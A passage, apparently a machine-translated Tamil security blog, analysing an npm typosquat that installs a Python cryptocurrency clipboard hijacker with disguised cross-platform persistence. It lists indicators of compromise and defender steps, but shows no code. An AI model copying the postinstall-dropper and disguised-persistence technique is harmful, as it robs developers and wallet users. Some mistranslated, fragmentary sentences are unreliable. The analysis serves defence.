  • README கருத்துத் திருட்டு. தொகுப்பின் README என்பது முறையானது @juggle/resize-observer README-ஐ ஒவ்வொரு பைட்டும் துல்லியமாக, உள்ளடக்கியவாறு இறக்குமதி குறிப்பிடும் எடுத்துக்காட்டுகள் @juggle/resize-observer அதுவே (வெளியீட்டுத் தொகுப்பு அல்ல). இயக்குபவர் இறக்குமதிகளை மீண்டும் எழுதக்கூட மெனக்கெடவில்லை — இது, readme ஆவணம் மாற்றியமைக்கப்படாமல், அப்படியே எடுக்கப்பட்டது என்பதற்கான ஒரு பொதுவான அறிகுறியாகும்.
  • மாற்றி அமைப்பதற்கு எந்த உள்கட்டமைப்பும் இல்லை. C2 எண்ட்பாயிண்ட், DNS தேடல், IP முகவரி எதுவும் இல்லை. தீங்கிழைக்கும் செயல்பாடு, உள்ளூர் கிளிப்பர் மற்றும் நிரலில் நேரடியாகக் குறிப்பிடப்பட்ட வாலட் தொகுப்பு ஆகியவற்றில் முழுமையாக பொதிந்துள்ளது. இது டொமைன் அல்லது ASN அடிப்படையிலான பிவட்டிங்கைச் சாத்தியமற்றதாக்குகிறது. வெவ்வேறு கேம்பெயின்களில் பிவட் செய்யும் தடுப்பாளர்கள், தங்களிடம் உள்ள முந்தைய கிளிப்பர்களுடன் வாலட்களின் ஹாஷ்-மேட்ச் செய்ய வேண்டும்; வெவ்வேறு பேக்கேஜ்களில் ஒரு வாலட்டை மீண்டும் பயன்படுத்துவதே, கேம்பெயின்களுக்கு இடையேயான மிகவும் எளிமையான இணைப்பாகும்.
  • பெயரிடும் தேர்வு. @jaggle/resizeobserves ஒரு எழுத்து மட்டும் வித்தியாசமாக உள்ளது @ஜக்ல் மற்றும் நன்கு அறியப்பட்டதிலிருந்து ஒரு மாறுபாடு மறுஅளவிடு-கவனிப்பான்ஒருங்கிணைந்த திருத்த இடைவெளி இரண்டு எழுத்துருக்கள் ஆகும். இது ஒரு திட்டமிட்ட காட்சி மோதலே தவிர, ஒரு பொதுவான குந்துகை அல்ல.

பேலோட் நடத்தையை அடிப்படையாகக் கொண்ட உந்துதல்: சந்தர்ப்பவாத கிளிப்போர்டு மாற்றீட்டின் மூலம் முழுமையான பணமாக்குதல். இதில் நற்சான்றிதழ் சேகரிப்பு இல்லை, ஹோஸ்ட் கைரேகை பதிவு இல்லை, சூழல் மாறிகளைப் படித்தல் இல்லை. பாதிக்கப்பட்டவர் யார் என்பது பற்றி இயக்குபவருக்குக் கவலையில்லை — பாதிக்கப்பட்டவரின் அடுத்த பரிமாற்றம் பட்டியலிடப்பட்ட முகவரிகளில் ஒன்றைச் சுட்டிக்காட்டுகிறதா என்பதில் மட்டுமே அவர் அக்கறை கொள்கிறார். நாற்பது-சங்கிலித் தொடர் பாதுகாப்பு என்பது நடைமுறையில் உள்ள லாட்டரி மாதிரி: பரவலாக வீசி, ஒவ்வொரு N நிறுவல்களுக்கும் ஒரு முறையாவது அதிக மதிப்புள்ள ஒரு பேஸ்ட் வந்து சேரும் என்று நம்புவது.

செயல்பாட்டாளர் நீக்குதல் குறித்து அக்கறையற்றவராகத் தெரிகிறார். ஒரே நோக்கத்தின் கீழ் இரண்டு மணி நேரத்திற்குள் ஒன்பது பதிப்புகளை வெளியிடுவது, 'வெளியிட்டு எரிக்கும்' ஒரு தந்திரமாகத் தெரிகிறது: நீக்குதல் தாமதம் ஏற்படுவதற்கு முன்பு பதிவகத்தின் அளவை அதிகப்படுத்தி, பின்னர் அடுத்த கட்டத்திற்குச் செல்வது. நாங்கள் கவனிக்கவில்லை. @ஜாகிள் இதை எழுதும் நேரத்தில் ஒரு புதிய நோக்கத்தின் கீழ் மீண்டும் வெளியிடப்படுகிறது, ஆனால் ஒத்த நோக்கங்களை நாங்கள் எதிர்பார்ப்போம் (@ஜாக்கி, @ஜகிள்-, @joggleஆபரேட்டர் இன்னும் செயலில் இருந்தால், வரும் நாட்களில் தோன்றும்.

 தாக்கம்

தற்போதைய தரவுத்தொகுப்பிலிருந்து உண்மையான பண மதிப்பில் தாக்கத்தை அளவிடுவது சாத்தியமில்லை. கிளிப்பர் எந்த டெலிமெட்ரியையும் பதிவு செய்வதில்லை, மேலும் பகுப்பாய்வு நிறுத்தப்படும் வரை வாலெட்டுகள் பதிலீட்டுப் பரிமாற்றங்களைப் பெறுவது இன்னும் காணப்படவில்லை (பட்டியலிடப்பட்ட சங்கிலிகளின் தொடர் ஆய்வு எங்கள் பட்டியலில் உள்ளது). சட்டப்பூர்வமான npm:@juggle/resize-observer வாரந்தோறும் சராசரியாக ஏழு இலக்கங்களில் பதிவிறக்கம் செய்யப்படுகிறது — இது டைப்போஸ்க்வாட் தாக்குதல்களுக்கு அதிகப் போக்குவரத்து உள்ள ஒரு இலக்காகும் — மேலும், இந்தத் தீங்கிழைக்கும் மென்பொருள் தொகுப்பு, தகவல் வெளிப்படுத்தப்பட்ட நேரத்தில் 24 மணி நேரத்திற்கும் குறைவாகவே பயன்பாட்டில் இருந்தது. இது, தாக்குதலுக்கு உள்ளானவர்களின் எண்ணிக்கையைக் கட்டுப்படுத்துகிறதே தவிர, அதை முற்றிலுமாக நீக்கிவிடுவதில்லை.

கண்காணிக்க வேண்டிய வெடிப்பு ஆரம் என்பது நேரடி பதிவிறக்கங்கள் அல்ல @jaggle/resizeobserves — அவை பெரும்பாலும் சிறியவையாக இருக்கும். இது **கடந்து நிறுவப்படும் முறை**: அதாவது, ஒரு டெவலப்பர் ஒரு சாண்ட்பாக்ஸ் திட்டத்தில் தொகுப்பைச் சேர்த்து, அதை இயக்குவது. npm நிறுவுபின்னர், இன்ஸ்டால் ஹூக் இயங்கியதையே மறந்துவிடுவது. போஸ்ட்இன்ஸ்டாலைச் செயல்படுத்திய ஒவ்வொரு கணினியிலும், ப்ராஜெக்ட் இன்னும் டிஸ்க்கில் இருக்கிறதா இல்லையா என்பதைப் பொருட்படுத்தாமல், இப்போது ஆட்டோ-ஸ்டார்ட்டில் ஒவ்வொரு பயனருக்குமான கிளிப்போர்டு ஹைஜேக்கர் உள்ளது. பேக்கேஜ் டைரக்டரியை அகற்றுவது முனை_மாடூல்கள் அது நிலைத்தன்மையை நீக்குவதில்லை.

தோன்றும் வடிவங்கள்

இந்தப் பிரச்சாரம் இரண்டு போக்குகளுக்கு எடுத்துக்காட்டாக விளங்குகிறது.

பைத்தான் தரவுச்சுமையை வழங்குவதற்கான ஒரு உறையாக npm. npm tarball என்பது 4-வரி நிறுவி; ஆனால், உண்மையான திறவுகோல் பைதான் தான், அது கணினி முழுவதும் நிறுவப்படுகிறது. பிப் தொகுக்கப்பட்ட கோப்பகத்திலிருந்து. இது புதிதல்ல — npm தொகுப்புகள் பைத்தானை நீக்குவதை நாம் முன்பே பார்த்திருக்கிறோம் — ஆனால் இது கிரிப்டோ-கிளிப்பர் பிரச்சாரங்களில் கணிசமாகப் பொதுவான ஒரு வடிவமாக மாறி வருகிறது. இயக்குபவருக்கு இதில் இருவகையான நன்மை உண்டு: பைத்தான் கிளிப்போர்டு நூலகங்கள் (பைப்பர்கிளிப் அவற்றுள் முதன்மையானவை) ஜாவாஸ்கிரிப்ட் சமமானவற்றை விடத் தூய்மையானவை மற்றும் பல இயங்குதளங்களில் இயங்கக்கூடியவை, மேலும் பெரும்பாலான தானியங்கு npm ஸ்கேனர்கள் ஜாவாஸ்கிரிப்ட் கோப்புகளுக்கும் பைத்தானுக்கும் அதிக முக்கியத்துவம் அளிக்கின்றன. .py கட்டுகளை லேசாக. இதன் விளைவாக, நிறுவும் இடம் அதிக சத்தத்தை உண்டாக்கும் — ஒரு புதிய குழாய் நிறுவல் வழக்கமாக இல்லாத ஒரு டெவலப்பர் கணினியில் மறைப்பது கடினம். குழாய் நிறுவல் போது npm நிறுவு.

இயங்குதளத்திற்கே உரிய பெயர்கள் மட்டுமே ஒரே மறைபொருள். சமீபத்திய பல கிளிப்பர்களும் சிறிய தரவு திருடர்களும், முறையான தோற்றமுடைய நிலைத்தன்மை லேபிள்களுக்கு ஆதரவாக, குறியீடு-நிலை மறைப்பை முற்றிலுமாகக் கைவிட்டுள்ளனர். python3-dbus-helper, com.apple.python.runtime, மற்றும் பைரன்டைம்ப்ரோக்கர் இவை பாடப்புத்தக உதாரணங்கள் — நாற்பது பயனர் சேவைகளின் பட்டியலில் ஒரு பாதுகாப்பாளரின் பார்வை கடந்துசெல்லும் பெயர்கள். இது ஒரு மலிவான, நீடித்த மறைமுகச் செயல்பாட்டு முறையாகும்: நீக்குதல் என்பது ஒவ்வொரு தொகுப்பிற்கும் தனித்தனியாகச் செய்யப்படும், ஆனால் நிலைத்தன்மைக் கோப்புகள் நீக்குதலுக்குப் பிறகும் நீடிக்கும், மேலும் உண்மையான தோற்றமுடைய ஒரு தளக் கூறின் பெயரால் பெயரிடப்பட்ட ஒரு சேவையானது, ஒரு வெளிப்படையான தணிக்கையைத் தவிர வேறு எதனாலும் சுத்தப்படுத்தப்படாது.

தடுப்பாட்டக்காரர்கள் என்ன செய்ய வேண்டும்

  • ~/.config/systemd/user/, ~/Library/LaunchAgents/, மற்றும் Get-ScheduledTask ஆகியவற்றைத் தணிக்கை செய்யவும். வெளியீடு டெவலப்பர் கணினிகளில் IOC-களில் பட்டியலிடப்பட்டுள்ள உள்ளீடுகளுக்கு இது பொருந்தும். npm தொகுப்பை நீக்குவது இவற்றை அப்படியே விட்டுவிடும்; இவற்றை கைமுறையாக நீக்க வேண்டும்.
  • பட்டியலிடப்பட்ட வாலட் முகவரிகளுக்கு தொகுதிப் பரிமாற்றங்கள் முகவரி அனுமதிப் பட்டியல் கிடைக்கும் கார்ப்பரேட் கருவூலம் மற்றும் DeFi வாலட் எல்லைகளில்.
  • ~/.config/clipboard-guardian/config.json கோப்பைத் தேடவும். டெவலப்பர்-இயந்திரத் தொகுப்பு முழுவதும் (மற்றும் இயங்குதள சமமானவை). எந்த தொகுப்பு பதிப்பு அதை வழங்கியிருந்தாலும், கோப்பின் இருப்பு என்பது அதிக நம்பகத்தன்மை வாய்ந்த தொற்று ஆகும்.
  • node_modules/ இல் clipboard_guardian/guardian.py ஐத் தேடவும். நீக்கத்திற்கு முந்தையதாக இருக்கக்கூடிய பில்ட்-கேச் ஸ்னாப்ஷாட்களில். கோப்பின் md5, மதிப்பாய்வு செய்யப்பட்ட அனைத்து பதிப்புகளிலும் நிலையானதாக உள்ளது.
  • பூட்டுக்கோப்பு-பின் @juggle/resize-observer (சட்டப்பூர்வமான தொகுப்பு) என்பதால், ஒரு எழுத்துத் தவறின் கீழ் எதிர்கால நிறுவல்களால் வேறு எதற்கும் தீர்வு காண முடியாது, குறிப்பாக லாக்ஃபைல் இல்லாத பணிப்பாய்வுகளில் இதுபோல. npx.
  • npm postinstall-ஐப் பயன்படுத்தி pip install-ஐ செயல்படுத்துவதைக் கையாளவும். அதிக தீவிரம் உள்ள கட்டமைப்பில்-pipeline கொள்கை. ஒரு npm தொகுப்பை நிறுவும் நேரத்தில் pip தேவைப்படுவதற்கு முறையான காரணம் எதுவும் இல்லை — பைதான் கருவிகள் பைதான் கருவிகளையே விநியோகிக்கின்றன.
  • pyperclip-ஐ இறக்குமதி செய்யும் python3-dbus-helper என்ற பெயருடைய செயல்முறைகளுக்காக, process_iter()-உடன் ஒப்பிடக்கூடிய கண்காணிப்புத் தரவைத் தேடவும். — மாறுவேடப் பொருத்தமின்மை (டி-பஸ் ஹெல்பர் ஒரு கிளிப்போர்டு லைப்ரரியை வைத்திருப்பது) தான் நம்மிடம் உள்ள மிகவும் தெளிவான நடத்தைக் காட்டியாகும்.
  • பாதிக்கப்பட்ட கணினிகளிலிருந்து ஒட்டப்பட்ட வாலட் முகவரிகளை சுழற்சி முறையில் மாற்றவும். கிளிப்போர்டு ஹைஜேக்கர் என்பது, வாலட் பயனர் இடைமுகத்திற்கும் பேஸ்ட் இலக்குக்கும் இடையிலான பாதையை ஊடுருவுகிறது; பாதிக்கப்பட்டிருக்கும்போது நகலெடுக்கப்படும் முகவரிகள் யாருக்கும் தெரியாமல் மாற்றப்படலாம். பாதிப்பு ஏற்பட்டிருக்கும் நேரத்தில் அனுப்பப்படும் எதுவும், தவறான முகவரிக்கு அனுப்பப்பட்டிருக்கக்கூடும் எனக் கருதப்பட வேண்டும்.

இதிலிருந்து நாம் அறிவது: நீக்கத்திற்குப் பிறகும் நிலைத்தன்மை நிலைத்திருக்கும். பதிவகம் இறுதியில் அதை அகற்றிவிடும். @jaggle/resizeobserves ஒன்பது பதிப்புகள் அனைத்திலும், systemd யூனிட், LaunchAgent மற்றும் Scheduled Task ஆகியவை தங்களைத் தாங்களே நீக்கிக்கொள்ளாது.

குறிப்புகள்

  • npm இல் @juggle/resize-observer — இந்த எழுத்துப்பிழைத் திருடன் போலியாகக் காட்டும் முறையான தொகுப்பு; பைட்டுக்கு பைட் செய்யப்படும் README கருத்துத் திருட்டிற்கு ஒரு அடிப்படையாகப் பயன்படுகிறது.
  • @jaggle/resize பதிவக மெட்டாடேட்டாவைக் கவனிக்கிறது — தடயவியல் காலவரிசைப்படுத்தலுக்குப் பயன்படும் வகையில், ஒன்பது தீங்கிழைக்கும் பதிப்புகளுக்கான நேர முத்திரைகளை வெளியிடவும்.
sca-tools-software-composition-analysis-tools
உங்கள் மென்பொருள் அபாயங்களுக்கு முன்னுரிமை அளித்து, சரிசெய்து, பாதுகாக்கவும்.
உங்கள் இலவச கணக்கைப் பெறுங்கள்.
கடன் அட்டை தேவையில்லை.

உங்கள் மென்பொருள் உருவாக்கம் மற்றும் விநியோகத்தைப் பாதுகாக்கவும்

Xygeni தயாரிப்பு தொகுப்புடன்